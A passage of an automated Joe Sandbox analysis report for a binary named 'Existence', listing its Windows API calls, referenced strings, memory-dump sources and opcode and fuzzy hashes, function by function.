                                                                                                                                                                                          • Opcode ID: ec8a9f72c71bc6e6e0e1e579a80d94de4c2ec250eafb146a58e3fd3d5c0d32d9
                                                                                                                                                                                          • Instruction ID: 66fe66295a21046f8a710169600ae03748c4f10d5160ffd0f037f274a0b7b067
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec8a9f72c71bc6e6e0e1e579a80d94de4c2ec250eafb146a58e3fd3d5c0d32d9
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE61C071A00619FAEB64DF64CC45FBE77A8AF08B11F10811EF915D61D1DBB8AD90CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 007A493D
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A4948
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A499F
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A49DD
                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 007A4A1B
                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A4A63
                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A4A9E
                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A4ACC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                          • API String ID: 1839972693-4113822522
                                                                                                                                                                                          • Opcode ID: 97f24f3df6d7eeee2560e220bbf5160f3383c776b2490277b8fdf065ea4f3c3d
                                                                                                                                                                                          • Instruction ID: 87013a4459f5baeb5aafd3d60fabf85522a60a5e62c88a583d0c90b3cdf2560b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f24f3df6d7eeee2560e220bbf5160f3383c776b2490277b8fdf065ea4f3c3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: D871E0726082058FC710EF24C84096BB7E8EFD5758F008A2DF89597262EB7AED45CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00796395
                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007963A7
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 007963BE
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 007963D3
                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 007963D9
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 007963E9
                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 007963EF
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00796410
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0079642A
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00796433
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079649A
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 007964D6
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 007964DC
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 007964E3
                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0079653A
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00796547
                                                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 0079656C
                                                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00796596
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 895679908-0
                                                                                                                                                                                          • Opcode ID: dde63d35ce8cc8d781cf1d27a731777d6220fe1e58742e34c3a8ff4548aa4753
                                                                                                                                                                                          • Instruction ID: c954ee071af9abe6ef18337483487389a9cb55a6163fab5ad4878e7d572e9f39
                                                                                                                                                                                          • Opcode Fuzzy Hash: dde63d35ce8cc8d781cf1d27a731777d6220fe1e58742e34c3a8ff4548aa4753
                                                                                                                                                                                          • Instruction Fuzzy Hash: 89714B71900605AFDF20DFA8DE49AAEBBF5FB48704F10462CE586A25A0D779ED44CB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 007B0884
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 007B088F
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 007B089A
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 007B08A5
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 007B08B0
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 007B08BB
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 007B08C6
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 007B08D1
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 007B08DC
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 007B08E7
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 007B08F2
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 007B08FD
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 007B0908
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 007B0913
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 007B091E
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 007B0929
                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 007B0939
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 007B097B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3215588206-0
                                                                                                                                                                                          • Opcode ID: f783f81d0ed54a19f33bf0937461052399813c8bbe1ef6bda6785afd7188a088
                                                                                                                                                                                          • Instruction ID: 2201a3fc7d422ce5ba5e5fe90cc1f8479392acdcf26c2a2e0d752a02d03eebc6
                                                                                                                                                                                          • Opcode Fuzzy Hash: f783f81d0ed54a19f33bf0937461052399813c8bbe1ef6bda6785afd7188a088
                                                                                                                                                                                          • Instruction Fuzzy Hash: F14144B0D08319AADB109FBA8C89D5EBFE8FF04754B50452AE15CE7291DA78A901CF91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00750436
                                                                                                                                                                                            • Part of subcall function 0075045D: InitializeCriticalSectionAndSpinCount.KERNEL32(0080170C,00000FA0,B9C7C235,?,?,?,?,00772733,000000FF), ref: 0075048C
                                                                                                                                                                                            • Part of subcall function 0075045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00772733,000000FF), ref: 00750497
                                                                                                                                                                                            • Part of subcall function 0075045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00772733,000000FF), ref: 007504A8
                                                                                                                                                                                            • Part of subcall function 0075045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007504BE
                                                                                                                                                                                            • Part of subcall function 0075045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007504CC
                                                                                                                                                                                            • Part of subcall function 0075045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007504DA
                                                                                                                                                                                            • Part of subcall function 0075045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00750505
                                                                                                                                                                                            • Part of subcall function 0075045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00750510
                                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 00750457
                                                                                                                                                                                            • Part of subcall function 00750413: __onexit.LIBCMT ref: 00750419
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • kernel32.dll, xrefs: 007504A3
                                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00750492
                                                                                                                                                                                          • InitializeConditionVariable, xrefs: 007504B8
                                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 007504C4
                                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 007504D2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                          • API String ID: 66158676-1714406822
                                                                                                                                                                                          • Opcode ID: 5ce7391efe438e0f7745462425f06be4d76e5fd5a198ad7721f769ffa37d00b2
                                                                                                                                                                                          • Instruction ID: fd7746ea448641a420b3df9955f3ba65026be7e962b4f9ccedccab527bd6c8ac
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ce7391efe438e0f7745462425f06be4d76e5fd5a198ad7721f769ffa37d00b2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A21F972A44708ABD7212BA49C0AFE977E5EF05B62F14413AFD0592280EBFC9C048AD5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                                          • API String ID: 176396367-1603158881
                                                                                                                                                                                          • Opcode ID: 66bc04cca2cfb6c88fdfda06b0673dae9432e7e548437c99fa59cb3dfbb8b5aa
                                                                                                                                                                                          • Instruction ID: 7b3a29c34d6452fc6296682a8e60a19778fa4f09340cc5e0e6ffb3b1505f063a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 66bc04cca2cfb6c88fdfda06b0673dae9432e7e548437c99fa59cb3dfbb8b5aa
                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E1F272E00516EBCF28DFB8D8556FEBBB1BF54710F104129E556E7240DB38AE8987A0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,007CDCD0), ref: 007A4F6C
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A4F80
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A4FDE
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A5039
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A5084
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A50EC
                                                                                                                                                                                            • Part of subcall function 0074FD52: _wcslen.LIBCMT ref: 0074FD5D
                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,007F7C10,00000061), ref: 007A5188
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                                                                                                          • Opcode ID: e4ad631b0e9d8e5ad4016c0fa1bc937205a136ba124bb2a4202d46c5dbd6b179
                                                                                                                                                                                          • Instruction ID: cdde81e08c80373f321de6531b95e51c5591130936dd02d74a38160ae4b28c17
                                                                                                                                                                                          • Opcode Fuzzy Hash: e4ad631b0e9d8e5ad4016c0fa1bc937205a136ba124bb2a4202d46c5dbd6b179
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EB1F371608702DFC714DF28C890A7BB7E5BFE6724F104A1DF59687292D778D884CAA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBBF8
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BBC10
                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BBC34
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBC60
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BBC74
                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BBC96
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBD92
                                                                                                                                                                                            • Part of subcall function 007A0F4E: GetStdHandle.KERNEL32(000000F6), ref: 007A0F6D
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBDAB
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007BBDC6
                                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007BBE16
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 007BBE67
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 007BBE99
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BBEAA
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BBEBC
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007BBECE
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 007BBF43
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2178637699-0
                                                                                                                                                                                          • Opcode ID: 0e55861a9b80f00f970b07deef0e2192aec80c51ada78c69aea7b5a7148af393
                                                                                                                                                                                          • Instruction ID: 25526cf8a1535d9769bbadbcb85edb67807f1a79f3e255bf295a231fe633cf60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e55861a9b80f00f970b07deef0e2192aec80c51ada78c69aea7b5a7148af393
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AF1AF71604340DFD714EF24C895BAABBE1BF85314F14895DF8858B2A2CBB9EC45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,007CDCD0), ref: 007B4B18
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007B4B2A
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,007CDCD0), ref: 007B4B4F
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,007CDCD0), ref: 007B4B9B
                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,007CDCD0), ref: 007B4C05
                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000009), ref: 007B4CBF
                                                                                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007B4D25
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 007B4D4F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                          • API String ID: 354098117-199464113
                                                                                                                                                                                          • Opcode ID: ecb9a001797cff8bbc8bfe7ddc59a5c1b9e4e1b1c983a07e2bac2c632a65e891
                                                                                                                                                                                          • Instruction ID: 1c2f3876684e1204deef6e1b085b69809d80bbc180cf36f586f61913fa4a6415
                                                                                                                                                                                          • Opcode Fuzzy Hash: ecb9a001797cff8bbc8bfe7ddc59a5c1b9e4e1b1c983a07e2bac2c632a65e891
                                                                                                                                                                                          • Instruction Fuzzy Hash: C6120971A00115EFDB14DF94C888EAEBBB5FF45314F248098F909AB252DB35ED46CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetMenuItemCount.USER32(008029C0), ref: 00773F72
                                                                                                                                                                                          • GetMenuItemCount.USER32(008029C0), ref: 00774022
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00774066
                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0077406F
                                                                                                                                                                                          • TrackPopupMenuEx.USER32(008029C0,00000000,?,00000000,00000000,00000000), ref: 00774082
                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0077408E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                          • API String ID: 36266755-4108050209
                                                                                                                                                                                          • Opcode ID: 8eecdb2095c30710c218648320b2d4c5e45c94074ef689557d4fb8eb1e3650e0
                                                                                                                                                                                          • Instruction ID: da742513205f828bc2ccf466945e8e5f97e2e75fb7295f6f779e921dff2a17ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8eecdb2095c30710c218648320b2d4c5e45c94074ef689557d4fb8eb1e3650e0
                                                                                                                                                                                          • Instruction Fuzzy Hash: FD71E330645205BAFF318B28DC49FAABF64FF043A4F108219F628A61E1C7B99D10D751
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(00000000,?), ref: 007C7823
                                                                                                                                                                                            • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007C7897
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007C78B9
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C78CC
                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 007C78ED
                                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00730000,00000000), ref: 007C791C
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007C7935
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 007C794E
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 007C7955
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007C796D
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007C7985
                                                                                                                                                                                            • Part of subcall function 00732234: GetWindowLongW.USER32(?,000000EB), ref: 00732242
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                          • String ID: 0$tooltips_class32
                                                                                                                                                                                          • API String ID: 2429346358-3619404913
                                                                                                                                                                                          • Opcode ID: 9265c8685dcfa10b24002fdc8444d70ea0fa48396d49d46b420859095636334e
